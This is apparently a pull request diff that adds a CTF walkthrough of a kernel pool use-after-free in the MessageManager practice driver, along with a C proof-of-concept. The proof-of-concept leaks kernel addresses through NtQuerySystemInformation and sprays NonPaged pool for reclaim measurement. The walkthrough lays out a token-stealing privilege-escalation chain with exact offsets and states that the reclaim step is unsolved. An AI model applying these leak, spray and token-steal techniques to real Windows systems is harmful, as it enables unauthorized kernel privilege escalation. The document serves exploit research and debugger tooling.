### PR TITLE
MessageManager CTF: pool-UAF walkthrough + exploitability PoC (WIP)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -27,5 +27,9 @@ target
 node_modules/
 package-lock.json
 
+# MSVC C build artifacts (examples/messagemanager exploit)
+*.obj
+*.exe
+
 # Local Claude Code config
 .claude/

--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -184,26 +184,47 @@ Each value cross-checks against the debugger: `x nt!PsInitialSystemProcess` prin
 `0xfffff806777c5ab0`, and `lm` gives the same driver base — so the leak plumbing is sound before a
 single byte of the driver is corrupted.
 
-## 6. From UAF to SYSTEM — the plan
+## 6. From UAF to SYSTEM — how far the primitives reach
 
-With a leak and a freed-but-referenced 0x68 chunk, the chain is:
+The intended payoff is **data-only** — the mitigations rule out anything else. CR4 on this box is
+`0xb50ef8`: **SMEP, SMAP, and CET all on**. So a ROP chain to clear CR4 is a dead end (CET faults
+the `ret`s, and there's no instruction-pointer control to begin with — the bug yields *data* writes,
+and kCFG guards indirect calls). The only viable model is to never execute attacker code:
 
-1. **Reclaim** the freed `Tgsm` chunk with a NonPaged spray controlled at `+0x08`/`+0x10` — the
-   `Flink`/`Blink` the Flush unlink writes. (This is the open engineering problem: most medium-IL
-   NonPaged sprays carry a header at the front. The reclaim is *measured* with `pool_find_tag` /
-   `pool_chunk` rather than assumed — the reason the tooling exists.)
-2. **Write-what-where** via the `+0x08` LIST_ENTRY unlink in Flush: `[Blink]=Flink` (with collateral
-   `[Flink+8]=Blink`, so both must be writable — it writes a *pointer*, not an arbitrary value).
-3. **Bootstrap R/W** by setting `KTHREAD.PreviousMode` (`+0x232`) to 0, which makes
+1. **Write-what-where** via the `+0x08` LIST_ENTRY unlink in Flush/SetData: `[Blink]=Flink` with
+   collateral `[Flink+8]=Blink` — it writes a *pointer* to an attacker address, so both operands
+   must be writable kernel addresses.
+2. **Bootstrap R/W** by writing `KTHREAD.PreviousMode` (`+0x232`) to 0, which makes
    `Nt{Read,Write}VirtualMemory` operate on kernel addresses.
-4. **Token steal:** read the System process's token via `PsInitialSystemProcess` and write it into
-   this process's `_EPROCESS.Token` (`+0x248`). The alternative one-shot — swap the token pointer
-   directly with the unlink, collateral landing harmlessly on `_TOKEN+0x08` (SourceIdentifier) —
-   needs the System token *value*, i.e. one kernel read, which is why the PreviousMode bootstrap
-   comes first.
+3. **Token steal:** read the System process's token via `PsInitialSystemProcess` (ntos + 0xFC5AB0)
+   and write it into this process's `_EPROCESS.Token` (`+0x248`).
 
-Stages 1 (leaks) and the full driver reverse are done and validated live; stages 2–3 (reclaim and
-token steal) are in progress.
+Every step of that is worked out and the addresses are all in hand (§5). **What is *not* solved is
+step 0 — the reclaim**, and it turns out to be the whole game:
+
+> The MESSAGE keeps its exploitable fields **low**: RefCount `+0x00`, the unlink LIST_ENTRY
+> `+0x08`/`+0x10`, the arbitrary-free Buffer `+0x18`. To weaponise the freed chunk, an attacker
+> has to reclaim it with a NonPaged (`NonPagedPoolNx`, 0x70 bucket) spray whose **attacker bytes
+> land at those offsets**. Every standard medium-IL primitive fails, and it fails *systemically*:
+
+| Reclaim spray | Measured with the pool tools | Verdict |
+|---|---|---|
+| Pipe write-data (`NpFr`) | `DATA_QUEUE_ENTRY` header is **0x30**; payload begins at chunk +0x30 | misses every field |
+| I/O ring registered buffers | bytes are read as `{Address, Length}`, and `Address` is **validated as user memory** | can't carry a kernel target |
+| Mailslot (MSFS) | FILE_OBJECT → FCB data queue is **empty**; msfs keeps no separate message chunk | no chunk to reclaim |
+
+The pattern is the point: every list-managed NonPaged object carries a `LIST_ENTRY`/header of ≥0x10
+before its first attacker-controlled byte — *above* exactly where this bug needs control. So the
+exploit's difficulty isn't the driver bug (a textbook locking UAF) or the mitigations (data-only
+sidesteps them); it's finding a **verbatim NonPaged reclaim** at this size. That is a genuine,
+open research question.
+
+**What this walkthrough establishes, then, is exploit*ability*, not a shell:** the UAF is confirmed
+and reproducible (§3), control of the freed chunk is *demonstrated* (the pipe reclaim lands
+attacker bytes in it — just at the wrong offset), and the two forward primitives — the unlink
+write-what-where and an **unconditional** arbitrary-free (`SetData` frees `msg+0x18` before it
+reallocates) — are pinned to exact instructions (§3). The reclaim, and the double-free →
+type-confusion route that would sidestep the offset problem, are where the work continues.
 
 ## Gotchas recap
 
@@ -216,3 +237,9 @@ token steal) are in progress.
 - **`!analyze` can misname the faulting module** — trust the bugcheck banner and `IP_IN_PAGED_CODE`.
 - **Verifier special pool hides a driver from naive walkers** — it needs a page-granular decoder;
   `pool_find_tag` handles it, and shows the guard page as an `Unreadable` neighbour.
+- **A full pool walk is expensive on a *live* KDNET target** — `pool_find_tag`/`pool_census`
+  traverse every free tree node-by-node over the wire, and a live target mutates the lists under
+  the walk (stale pointers get chased, diagnostics balloon), so the call can exceed the engine
+  timeout and stall follow-ups. On a dump it's cheap. To find one object on a live target, prefer
+  the targeted route (`!handle`/FILE_OBJECT/`dps`) over a tag walk; the snapshot is cached per
+  session, so pay the walk once.

--- a/docs/messagemanager-walkthrough.md
+++ b/docs/messagemanager-walkthrough.md
@@ -1,0 +1,218 @@
+# MessageManager: a pool UAF, and what it takes to see it
+
+A tour of the **MessageManager** CTF driver on a **live KDNET kernel** (Windows Server 26100),
+driven end to end with windbg-mcp. Unlike the [HEVD](hevd-ioctl-walkthrough.md) and
+[mountmgr](driver-ioctl-walkthrough.md) tours — which are about *reaching* an IOCTL — this one is
+about a **use-after-free in the kernel pool**, and the tooling you need to watch a freed chunk get
+reclaimed. There is **no PDB**, so everything is `module+RVA`.
+
+> **The thesis.** The bug is a garden-variety locking mistake. The interesting part is that
+> *observing* it on Windows 26100 meant fixing the pool walker in four separate places where a new
+> OS release had quietly moved the furniture — because a pool walker that silently returns "empty"
+> is worse than no walker at all. This is the story of both: the driver's UAF, and the four
+> breakages between a walker that worked on 22H2 and one that tells the truth on 26100.
+
+The four kernel-pool tools this walkthrough leans on (`pool_find_tag`, `pool_chunk`, `pool_census`,
+`pool_diagnostics`) were built for exactly this target; see the
+[README's tool list](../README.md#tools).
+
+## 1. Attach over KDNET
+
+```jsonc
+attach_kernel { "connection": "net:port=50000,key=<w.x.y.z>" }   // ask the user for the real string
+```
+
+```text
+Windows 10 Kernel Version 26100 MP (4 procs) Free x64
+Kernel base = 0xfffff806`76800000   PsLoadedModuleList = 0xfffff806`776f4fd0
+```
+
+> **Gotcha — the attach *blocks* on an INFINITE wait.** If the target isn't dialed in, the tool
+> reports a *timeout* while the engine stays parked and completes the moment the guest connects.
+> Don't fire more tools into a parked attach; `session_status` says how long it has waited, and
+> `end_session` reclaims it. The target must dial this host:
+> `bcdedit /dbgsettings net hostip:<debugger-ip> port:50000 key:<key>` (**colons**, not `=`).
+
+## 2. Reverse the driver with no symbols
+
+`\Driver\MessageManager` ships no PDB, so start from the driver object and read the dispatch table
+straight off it:
+
+```jsonc
+execute { "command": "!drvobj \\Driver\\MessageManager 2" }
+```
+
+```text
+[0e] IRP_MJ_DEVICE_CONTROL   fffff806`0c881230
+```
+
+Disassembling the dispatch (`uf fffff8060c881230`) shows a plain `sub`/`je` compare chain over
+`IoControlCode` (read from `IO_STACK_LOCATION+0x18`), which pins the four handlers. The image base is
+`0xfffff8060c880000`, so the RVAs are stable across boots even without symbols:
+
+| IOCTL       | Op       | Handler RVA |
+|-------------|----------|-------------|
+| `0x222000`  | Create   | `+0x10d4`   |
+| `0x222004`  | Delete   | `+0x1000`   |
+| `0x222008`  | SetData  | `+0x1560`   |
+| `0x22200C`  | Flush    | `+0x1478`   |
+
+`uf`-ing each handler reconstructs the object model. **Create** calls
+`ExAllocatePool2(0x40, 0x68, 'Tgsm')` — the `0x40` is `POOL_FLAG_NON_PAGED`, encoded cutely as
+`lea ecx,[rdi-28h]` off the `0x68` size — so a **MESSAGE is a 0x68 NonPaged chunk**:
+
+```text
++0x00  RefCount              (init 1)
++0x08  LIST_ENTRY            small/large list linkage
++0x18  Buffer                paged 'Tfub' allocation
++0x20  Length
++0x28  FAST_MUTEX            (Count=+0x28, Event=+0x40)
++0x60  Linked                on-a-list flag
+```
+
+A **global handle list** (head at image `+0x30a0`, lock `+0x3060`, id counter `+0x3000`) maps each
+returned `id` to its MESSAGE through 0x20-byte `Tdnh` nodes `{id, MESSAGE*, LINKS}`. Messages link
+into a **small** or **large** list (split at `Length == 0x200`) by their own `+0x08` LIST_ENTRY.
+
+## 3. The vulnerability: locking, not arithmetic
+
+Single-threaded, the refcounting is balanced. The defect is that the four operations disagree about
+which lock guards a MESSAGE:
+
+- **SetData** looks a message up in the handle list and does `lock inc [msg]` — **without** holding
+  that message's `+0x28` FAST_MUTEX.
+- **Delete** and **Flush** drop the refcount and, when it hits zero,
+  `ExFreePoolWithTag(msg, 'Tgsm')` — also without that per-message mutex.
+
+So SetData can `lock inc` a message whose refcount another thread has already driven to zero and is
+about to free — a classic revive-after-free — and the cross-list move in SetData unlinks the message
+holding only its own mutex, never the *source* list's lock. The payoff is a **premature free of the
+0x68 `Tgsm` chunk while a live reference still points at it**.
+
+Under Driver Verifier this is an instant, unambiguous crash. A 6-thread SetData/Flush race
+(`mm_client.ps1 -Op Race`) bugchecks on the first run:
+
+```text
+BugCheck 50, PAGE_FAULT_IN_NONPAGED_AREA
+faulting IP: MessageManager+0x14de   (the Flush list-walk: mov rax,[rcx+8])
+FAILURE_BUCKET_ID: AV_VRF
+```
+
+> **Gotcha — `!analyze` misnames the module.** `Failure.Exception.IP.Module` came back `mpsdrv`;
+> the bugcheck banner and `IP_IN_PAGED_CODE` are trustworthy, the "friendly" attribution is not.
+
+`MessageManager+0x14de` is inside Flush (`+0x1478`), at the `[Blink]=Flink; [Flink+8]=Blink` unlink
+of a freed node — which is exactly the write-what-where an exploit wants (more on that in §6).
+
+## 4. Watching the chunk — and why the walker had to be fixed four times
+
+To exploit a UAF you have to *see* the freed chunk and what reclaims it. That is what the pool tools
+are for:
+
+```jsonc
+pool_find_tag { "tag": "Tgsm" }
+```
+
+```text
+tag `Tgsm`: 1 allocation(s), 0x68 bytes total
+ffff8c8f`13a02f90  0x68  SpecialNonPagedNx  Allocated
+```
+
+```jsonc
+pool_chunk { "address": "ffff8c8f13a02f90" }
+```
+
+`pool_chunk` reports the chunk **and its neighbours**, which is what tells you what a reclaim would
+land next to — and under Verifier it correctly shows the adjacent **guard page** as an `Unreadable`
+neighbour rather than guessing.
+
+Getting these two calls to tell the truth on 26100 took **four** fixes in the underlying walker
+(`win-kexp`), each one a place where the OS had moved something and the walk failed *silently*:
+
+1. **VS free-chunk state moved out of `_HEAP_VS_CONTEXT`.** On 26100 that struct is 0x60 bytes and
+   carries none of `FreeChunkTree`/`SubsegmentList`/`DelayFreeContext`; they live in a new
+   `_HEAP_VS_AFFINITY_SLOT`, reached by a self-relative, ×64-scaled slot-map arithmetic off the
+   context. Any walker that reads `_HEAP_VS_CONTEXT.FreeChunkTree` reads garbage.
+2. **The page-segment signature dropped its constant.** `_HEAP_PAGE_SEGMENT.Signature` used to be
+   `segment ^ context ^ heap_key ^ 0xa2e64ead…`; on 26100 the constant is gone. Every segment
+   failed authentication, so **every chunk vanished** — and the walk returned an *empty pool*, not
+   an error. (This is the breakage that motivated surfacing walk diagnostics everywhere: "I saw
+   nothing" and "there is nothing" must never render the same.)
+3. **Verifier special pool was discovered but not decoded.** A driver under `verifier /flags 0x1`
+   gets page-per-allocation special pool, whose range descriptors carry `DESCRIPTOR_FLAG_LFH` — so
+   the range was misparsed as an LFH subsegment, judged "implausible", and discarded before any
+   walking. The chunk above (`SpecialNonPagedNx`) is only visible because that path was fixed to
+   decode special pool page-granularly (data at `page + 0x1000 - align_up(size,16)`).
+4. **Page-straddling LFH slots.** LFH slots whose data crossed a page boundary were mis-read; the
+   fix stopped reporting the straddlers as corruption.
+
+When the walk *is* incomplete, the tools say so rather than pretending — the whole point of the
+`complete` flag threaded through `pool_census`/`pool_diagnostics`:
+
+```jsonc
+pool_diagnostics { "filter": "13a0" }   // a plain case-insensitive substring, not a pattern
+```
+
+> **Method note.** A real walk emits ~18k diagnostics across 100+ categories, so every summary
+> truncates and the one line explaining a specific heap is never in the head. `pool_diagnostics`
+> with a substring filter found the special-pool cause in **one** call, after three rounds of
+> guessing had failed. Build the filter before theorising.
+
+## 5. Defeating ASLR from outside the driver
+
+There is **no read-back IOCTL**, so the exploit cannot leak addresses through the driver. Everything
+it needs comes from `NtQuerySystemInformation`, all available at medium IL
+(`examples/messagemanager/mm_exploit.c`, `leak` mode):
+
+```text
+[leaks]
+  ntoskrnl base            : 0xfffff80676800000
+  PsInitialSystemProcess   : 0xfffff806777c5ab0   (ntos + 0xFC5AB0)
+  MessageManager base      : 0xfffff8060c880000
+  this _EPROCESS           : 0xffffe6091811a080
+  this _KTHREAD (+0x232 PreviousMode)
+  big pool                 : 6420 entries, NonPaged addresses returned
+```
+
+- `SystemModuleInformation` → the kernel and driver bases (the driver base matches the one reversed
+  in §2 to the byte).
+- `SystemExtendedHandleInformation` → this process's `_EPROCESS` and this thread's `_KTHREAD`, found
+  by matching a real handle to self against the system-wide handle table.
+- `SystemBigPoolInformation` → real NonPaged pool addresses, which the reclaim spray will need.
+
+Each value cross-checks against the debugger: `x nt!PsInitialSystemProcess` prints exactly
+`0xfffff806777c5ab0`, and `lm` gives the same driver base — so the leak plumbing is sound before a
+single byte of the driver is corrupted.
+
+## 6. From UAF to SYSTEM — the plan
+
+With a leak and a freed-but-referenced 0x68 chunk, the chain is:
+
+1. **Reclaim** the freed `Tgsm` chunk with a NonPaged spray controlled at `+0x08`/`+0x10` — the
+   `Flink`/`Blink` the Flush unlink writes. (This is the open engineering problem: most medium-IL
+   NonPaged sprays carry a header at the front. The reclaim is *measured* with `pool_find_tag` /
+   `pool_chunk` rather than assumed — the reason the tooling exists.)
+2. **Write-what-where** via the `+0x08` LIST_ENTRY unlink in Flush: `[Blink]=Flink` (with collateral
+   `[Flink+8]=Blink`, so both must be writable — it writes a *pointer*, not an arbitrary value).
+3. **Bootstrap R/W** by setting `KTHREAD.PreviousMode` (`+0x232`) to 0, which makes
+   `Nt{Read,Write}VirtualMemory` operate on kernel addresses.
+4. **Token steal:** read the System process's token via `PsInitialSystemProcess` and write it into
+   this process's `_EPROCESS.Token` (`+0x248`). The alternative one-shot — swap the token pointer
+   directly with the unlink, collateral landing harmlessly on `_TOKEN+0x08` (SourceIdentifier) —
+   needs the System token *value*, i.e. one kernel read, which is why the PreviousMode bootstrap
+   comes first.
+
+Stages 1 (leaks) and the full driver reverse are done and validated live; stages 2–3 (reclaim and
+token steal) are in progress.
+
+## Gotchas recap
+
+- **Attach blocks on an INFINITE wait** — diagnose a hung attach out-of-band, don't hammer tools.
+- **The whole guest freezes while broken in** — the KD link only runs the target in bursts between
+  break-ins, too short for a WinRM round-trip. For guest-side work, `end_session` to detach fully,
+  then re-attach to observe. Release with `end_session`, never a process kill (it wedges the KD stub).
+- **A pool walker that "sees nothing" is not proof of an empty pool** — treat "rejected everything"
+  as an error; the tools surface walk coverage (`complete`) and diagnostics for exactly this.
+- **`!analyze` can misname the faulting module** — trust the bugcheck banner and `IP_IN_PAGED_CODE`.
+- **Verifier special pool hides a driver from naive walkers** — it needs a page-granular decoder;
+  `pool_find_tag` handles it, and shows the guard page as an `Unreadable` neighbour.

--- a/examples/messagemanager/build.cmd
+++ b/examples/messagemanager/build.cmd
@@ -1,0 +1,13 @@
+@echo off
+rem Build a MessageManager tool with the host MSVC toolchain.
+rem Usage: build.cmd <source.c> [out.exe]
+setlocal
+set VCVARS=C:\Program Files (x86)\Microsoft Visual Studio\18\BuildTools\VC\Auxiliary\Build\vcvars64.bat
+if not exist "%VCVARS%" (
+  echo vcvars64.bat not found at "%VCVARS%"
+  exit /b 1
+)
+call "%VCVARS%" >nul
+if "%~2"=="" ( set OUT=%~dpn1.exe ) else ( set OUT=%~2 )
+cl /nologo /W3 /O2 /GS- /Fe:"%OUT%" "%~1" /link /SUBSYSTEM:CONSOLE ntdll.lib advapi32.lib
+endlocal

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -327,6 +327,10 @@ static int do_demo(void) {
  * the offset whose value is 0x00 is where attacker control begins.
  */
 
+/* Inbound buffer of the spray pipes. A write no larger than this queues without a reader;
+ * a larger write blocks (this thread never drains the server), so pipe payloads are capped. */
+#define MM_PIPE_BUFFER 0x1000
+
 /* Named message-mode pipe, data queued (unread) in NonPaged pool. Returns the server
  * handle (keep it open to hold the allocation); the written record carries the ramp. */
 static HANDLE spray_pipe_record(int index, ULONG datalen) {
@@ -334,7 +338,7 @@ static HANDLE spray_pipe_record(int index, ULONG datalen) {
     swprintf(name, 128, L"\\\\.\\pipe\\mmspray_%d_%lu", GetCurrentProcessId(), (ULONG)index);
     HANDLE server = CreateNamedPipeW(name, PIPE_ACCESS_DUPLEX,
                                      PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
-                                     1, 0x1000, 0x1000, 0, NULL);
+                                     1, MM_PIPE_BUFFER, MM_PIPE_BUFFER, 0, NULL);
     if (server == INVALID_HANDLE_VALUE) return NULL;
     HANDLE client = CreateFileW(name, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                 OPEN_EXISTING, 0, NULL);
@@ -401,6 +405,13 @@ static int do_spray(int argc, char **argv) {
         printf("[spray] count must be > 0; got %d\n", count);
         return 2;
     }
+    /* A pipe write larger than the pipe buffer blocks with no reader, hanging the spray before
+     * the inspection banner. (0x70-bucket reclaim payloads are tiny, so this only bites misuse.) */
+    if (!is_mailslot && datalen > MM_PIPE_BUFFER) {
+        printf("[spray] pipe datalen must be <= 0x%x (the pipe buffer); got 0x%lx\n",
+               MM_PIPE_BUFFER, datalen);
+        return 2;
+    }
     printf("[spray] %s: %d records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
            prim, count, datalen);
 
@@ -413,6 +424,14 @@ static int do_spray(int argc, char **argv) {
     for (int i = 0; i < count; i++) {
         HANDLE h = spray(i, datalen);
         if (h) held[i] = h, ok++;
+    }
+    /* Nothing queued (handle/pool pressure): don't announce a hold and sleep for 10 minutes on
+     * an empty pool -- an automated experiment would stall and read success where there is
+     * nothing to inspect. */
+    if (ok == 0) {
+        printf("[spray] 0/%d records queued; nothing to inspect, not holding\n", count);
+        free(held);
+        return 1;
     }
     printf("[spray] %d/%d records queued; holding. Inspect NonPaged pool now.\n", ok, count);
     /* `pool_find_tag` takes an exact 1-4 byte tag (no wildcards) and reuses this session's

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -408,12 +408,14 @@ static int do_spray(int argc, char **argv) {
         if (h) held[i] = h, ok++;
     }
     printf("[spray] %d/%d records queued; holding. Inspect NonPaged pool now.\n", ok, count);
-    /* `pool_find_tag` takes an exact 1-4 byte tag (no wildcards). Pipe write-data is tagged
-     * `NpFr`; mailslot keeps no separate reclaimable chunk, so reach it by the FILE_OBJECT. */
+    /* `pool_find_tag` takes an exact 1-4 byte tag (no wildcards) and reuses this session's
+     * cached snapshot, so a walk from before the spray won't show these records -- pass
+     * refresh:true. Mailslot is a negative control: MSFS keeps no separate message chunk. */
     const char *hint = is_mailslot
-        ? "reach the message via its FILE_OBJECT (!handle -> FsContext), not a tag"
-        : "pool_find_tag NpFr";
-    printf("[spray] pid=%lu - search NonPaged pool for \"MMSPRAY!\", or %s.\n",
+        ? "note: mailslot is a NEGATIVE control -- MSFS keeps no separate message chunk "
+          "(the FCB data queue stays empty), so there is nothing here to reclaim"
+        : "pool_find_tag NpFr with refresh:true (a cached pre-spray snapshot omits these)";
+    printf("[spray] pid=%lu - search NonPaged pool for \"MMSPRAY!\"; %s.\n",
            GetCurrentProcessId(), hint);
     fflush(stdout);
     Sleep(600 * 1000);   /* hold long enough to detach->reattach->inspect */

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -311,6 +311,61 @@ static int do_demo(void) {
     return 0;
 }
 
+/* ---- NonPaged reclaim sprays (measurement) --------------------------------------- */
+/*
+ * The freed MESSAGE is a 0x68 NonPaged chunk; the write-what-where wants attacker bytes
+ * at chunk +0x08/+0x10 (the Flink/Blink the Flush unlink writes). Whether a given spray
+ * reaches those offsets is a property of the object's header, which is easiest to just
+ * measure: fill the payload with a ramp (byte[i] = i) so that, read back in the debugger,
+ * the offset whose value is 0x00 is where attacker control begins.
+ */
+
+/* Named message-mode pipe, data queued (unread) in NonPaged pool. Returns the server
+ * handle (keep it open to hold the allocation); the written record carries the ramp. */
+static HANDLE spray_pipe_record(int index, ULONG datalen) {
+    WCHAR name[128];
+    swprintf(name, 128, L"\\\\.\\pipe\\mmspray_%d_%lu", GetCurrentProcessId(), (ULONG)index);
+    HANDLE server = CreateNamedPipeW(name, PIPE_ACCESS_DUPLEX,
+                                     PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
+                                     1, 0x1000, 0x1000, 0, NULL);
+    if (server == INVALID_HANDLE_VALUE) return NULL;
+    HANDLE client = CreateFileW(name, GENERIC_READ | GENERIC_WRITE, 0, NULL,
+                                OPEN_EXISTING, 0, NULL);
+    if (client == INVALID_HANDLE_VALUE) { CloseHandle(server); return NULL; }
+
+    UCHAR *rec = malloc(datalen);
+    if (!rec) { CloseHandle(client); CloseHandle(server); return NULL; }
+    for (ULONG i = 0; i < datalen; i++) rec[i] = (UCHAR)i;  /* ramp: value == offset */
+    memcpy(rec, "MMSPRAY!", 8);                              /* magic to grep for */
+    DWORD wrote = 0;
+    WriteFile(client, rec, datalen, &wrote, NULL);           /* queued, never read */
+    free(rec);
+    CloseHandle(client);   /* the queued data survives on the server side */
+    return server;
+}
+
+static int do_spray(int argc, char **argv) {
+    ULONG datalen = argc > 2 ? (ULONG)strtoul(argv[2], NULL, 0) : 0x40;
+    int count = argc > 3 ? atoi(argv[3]) : 64;
+    printf("[spray] %d pipe records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
+           count, datalen);
+
+    HANDLE *held = calloc(count, sizeof(HANDLE));
+    int ok = 0;
+    for (int i = 0; i < count; i++) {
+        HANDLE h = spray_pipe_record(i, datalen);
+        if (h) held[i] = h, ok++;
+    }
+    printf("[spray] %d/%d records queued; holding. Inspect NonPaged pool now.\n", ok, count);
+    printf("[spray] pid=%lu — search NonPaged pool for \"MMSPRAY!\" (`s -a`), or pool_find_tag NpF*.\n",
+           GetCurrentProcessId());
+    fflush(stdout);
+    Sleep(600 * 1000);   /* hold long enough to detach->reattach->inspect */
+    for (int i = 0; i < count; i++) if (held[i]) CloseHandle(held[i]);
+    free(held);
+    return 0;
+}
+
 int main(int argc, char **argv) {
     if (!resolve_ntdll()) {
         printf("could not resolve NtQuerySystemInformation\n");
@@ -319,6 +374,7 @@ int main(int argc, char **argv) {
     const char *mode = argc > 1 ? argv[1] : "leak";
     if (_stricmp(mode, "leak") == 0) return do_leak();
     if (_stricmp(mode, "demo") == 0) return do_demo();
-    printf("usage: %s [leak|demo]\n", argv[0]);
+    if (_stricmp(mode, "spray") == 0) return do_spray(argc, argv);
+    printf("usage: %s [leak|demo|spray [datalen] [count]]\n", argv[0]);
     return 2;
 }

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -295,20 +295,27 @@ static int do_demo(void) {
     }
     printf("[demo] created id=%lu\n", id);
 
+    int failed = 0;
     UCHAR body[0x40];
     memset(body, 0x41, sizeof(body));
-    if (!mm_setdata(dev, id, body, sizeof(body)))
+    if (!mm_setdata(dev, id, body, sizeof(body))) {
         printf("[demo] SetData failed: %lu\n", GetLastError());
-    else
+        failed = 1;
+    } else {
         printf("[demo] SetData ok (0x40 bytes -> small list)\n");
+    }
 
-    if (!mm_delete(dev, id))
+    if (!mm_delete(dev, id)) {
         printf("[demo] Delete failed: %lu\n", GetLastError());
-    else
+        failed = 1;
+    } else {
         printf("[demo] Delete ok\n");
+    }
 
     CloseHandle(dev);
-    return 0;
+    /* A script driving this mode to validate the round trip must see a nonzero exit when any
+     * IOCTL failed, not just the printed error. */
+    return failed;
 }
 
 /* ---- NonPaged reclaim sprays (measurement) --------------------------------------- */

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -376,6 +376,12 @@ static int do_spray(int argc, char **argv) {
     ULONG datalen = argc > 3 ? (ULONG)strtoul(argv[3], NULL, 0) : 0x40;
     int count = argc > 4 ? atoi(argv[4]) : 200;
     int is_mailslot = _stricmp(prim, "mailslot") == 0;
+    /* Only the two known primitives -- a typo would silently spray pipes while labelling the
+     * measurement banner with the wrong name, mis-attributing the observed pool layout. */
+    if (!is_mailslot && _stricmp(prim, "pipe") != 0) {
+        printf("[spray] unknown primitive \"%s\"; use \"pipe\" or \"mailslot\"\n", prim);
+        return 2;
+    }
     HANDLE (*spray)(int, ULONG) = is_mailslot ? spray_mailslot_record : spray_pipe_record;
     /* The 8-byte magic is memcpy'd unconditionally, so a shorter payload would overflow the
      * record allocation before any measurement happens. */
@@ -384,10 +390,18 @@ static int do_spray(int argc, char **argv) {
                datalen);
         return 2;
     }
+    if (count <= 0) {
+        printf("[spray] count must be > 0; got %d\n", count);
+        return 2;
+    }
     printf("[spray] %s: %d records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
            prim, count, datalen);
 
-    HANDLE *held = calloc(count, sizeof(HANDLE));
+    HANDLE *held = calloc((size_t)count, sizeof(HANDLE));
+    if (!held) {
+        printf("[spray] could not allocate the handle array for %d records\n", count);
+        return 2;
+    }
     int ok = 0;
     for (int i = 0; i < count; i++) {
         HANDLE h = spray(i, datalen);

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -344,20 +344,46 @@ static HANDLE spray_pipe_record(int index, ULONG datalen) {
     return server;
 }
 
+/* Mailslot (MSFS): an unread message queues verbatim in NonPaged pool. MSFS's per-message
+ * header is smaller than NPFS's, so this may expose lower chunk offsets. Returns the server
+ * handle to hold; the message carries the ramp. */
+static HANDLE spray_mailslot_record(int index, ULONG datalen) {
+    WCHAR name[128];
+    swprintf(name, 128, L"\\\\.\\mailslot\\mmspray_%d_%lu", GetCurrentProcessId(), (ULONG)index);
+    HANDLE server = CreateMailslotW(name, 0, MAILSLOT_WAIT_FOREVER, NULL);
+    if (server == INVALID_HANDLE_VALUE) return NULL;
+    HANDLE client = CreateFileW(name, GENERIC_WRITE, FILE_SHARE_READ, NULL,
+                                OPEN_EXISTING, 0, NULL);
+    if (client == INVALID_HANDLE_VALUE) { CloseHandle(server); return NULL; }
+
+    UCHAR *rec = malloc(datalen);
+    if (!rec) { CloseHandle(client); CloseHandle(server); return NULL; }
+    for (ULONG i = 0; i < datalen; i++) rec[i] = (UCHAR)i;     /* ramp: value == offset */
+    memcpy(rec, "MMSPRAY!", 8);                                 /* magic to grep for */
+    DWORD wrote = 0;
+    WriteFile(client, rec, datalen, &wrote, NULL);              /* queued, never read */
+    free(rec);
+    CloseHandle(client);   /* the queued message survives on the server side */
+    return server;
+}
+
 static int do_spray(int argc, char **argv) {
-    ULONG datalen = argc > 2 ? (ULONG)strtoul(argv[2], NULL, 0) : 0x40;
-    int count = argc > 3 ? atoi(argv[3]) : 64;
-    printf("[spray] %d pipe records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
-           count, datalen);
+    const char *prim = argc > 2 ? argv[2] : "pipe";
+    ULONG datalen = argc > 3 ? (ULONG)strtoul(argv[3], NULL, 0) : 0x40;
+    int count = argc > 4 ? atoi(argv[4]) : 200;
+    HANDLE (*spray)(int, ULONG) =
+        _stricmp(prim, "mailslot") == 0 ? spray_mailslot_record : spray_pipe_record;
+    printf("[spray] %s: %d records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
+           prim, count, datalen);
 
     HANDLE *held = calloc(count, sizeof(HANDLE));
     int ok = 0;
     for (int i = 0; i < count; i++) {
-        HANDLE h = spray_pipe_record(i, datalen);
+        HANDLE h = spray(i, datalen);
         if (h) held[i] = h, ok++;
     }
     printf("[spray] %d/%d records queued; holding. Inspect NonPaged pool now.\n", ok, count);
-    printf("[spray] pid=%lu — search NonPaged pool for \"MMSPRAY!\" (`s -a`), or pool_find_tag NpF*.\n",
+    printf("[spray] pid=%lu — search NonPaged pool for \"MMSPRAY!\", or pool_find_tag NpF*/Msfs.\n",
            GetCurrentProcessId());
     fflush(stdout);
     Sleep(600 * 1000);   /* hold long enough to detach->reattach->inspect */
@@ -375,6 +401,6 @@ int main(int argc, char **argv) {
     if (_stricmp(mode, "leak") == 0) return do_leak();
     if (_stricmp(mode, "demo") == 0) return do_demo();
     if (_stricmp(mode, "spray") == 0) return do_spray(argc, argv);
-    printf("usage: %s [leak|demo|spray [datalen] [count]]\n", argv[0]);
+    printf("usage: %s [leak|demo|spray [pipe|mailslot] [datalen] [count]]\n", argv[0]);
     return 2;
 }

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1,0 +1,324 @@
+/*
+ * mm_exploit.c - local privilege escalation PoC for the MessageManager CTF driver.
+ *
+ * Runs on the target VM (see examples/messagemanager/mm_client.ps1 for the driver's
+ * IOCTL contract). windbg-mcp drives the kernel debugger from the host and watches the
+ * pool while this exercises the bug; the two halves are out of band.
+ *
+ * Build on the host with the sibling build.cmd (MSVC), then copy the .exe to the guest.
+ *
+ * The exploit is staged so each half can be validated on its own against the debugger:
+ *
+ *   leak  - user-mode infoleaks only (no driver touched): kernel + driver base via
+ *           SystemModuleInformation, this process's _EPROCESS and this thread's _KTHREAD
